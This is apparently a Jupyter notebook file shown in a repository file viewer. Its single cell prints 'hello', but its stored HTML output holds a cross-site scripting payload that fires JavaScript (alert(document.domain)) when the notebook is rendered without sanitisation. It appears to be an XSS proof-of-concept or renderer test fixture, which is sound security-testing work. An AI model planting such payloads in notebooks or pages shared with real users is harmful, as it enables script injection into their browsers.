File size: 385 Bytes
481f35d
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
{
  "cells": [
    {
      "cell_type": "code",
      "outputs": [
        {
          "output_type": "display_data",
          "data": {
            "text/html": "<img src=x onerror=alert(document.domain)>"
          }
        }
      ],
      "source": ["print('hello')"]
    }
  ],
  "metadata": {"kernelspec": {"display_name": "Python 3"}},
  "nbformat": 4,
  "nbformat_minor": 5
}